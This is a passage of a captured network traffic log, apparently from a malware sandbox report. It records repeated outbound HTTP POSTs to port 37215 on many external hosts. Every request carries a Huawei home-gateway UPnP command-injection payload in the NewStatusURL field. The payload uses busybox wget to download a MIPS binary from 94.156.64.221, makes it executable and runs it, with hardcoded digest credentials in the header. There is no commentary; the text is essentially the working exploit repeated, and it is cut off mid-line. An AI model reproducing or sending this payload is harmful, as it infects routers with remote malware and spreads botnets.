                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    208192.168.2.2349194156.227.20.17137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252167940 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    209192.168.2.2341014156.167.5.20137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252202034 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    210192.168.2.2348832156.198.87.20237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252243996 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    211192.168.2.2352362156.45.224.4337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252285957 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    212192.168.2.2341586197.22.210.22237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252324104 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    213192.168.2.235970041.139.183.23237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252357960 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    214192.168.2.2353196156.58.214.2837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252388000 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    215192.168.2.2349906156.113.109.24737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252427101 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    216192.168.2.2345594156.9.236.10737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252468109 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    217192.168.2.2349600197.171.180.10237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252554893 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 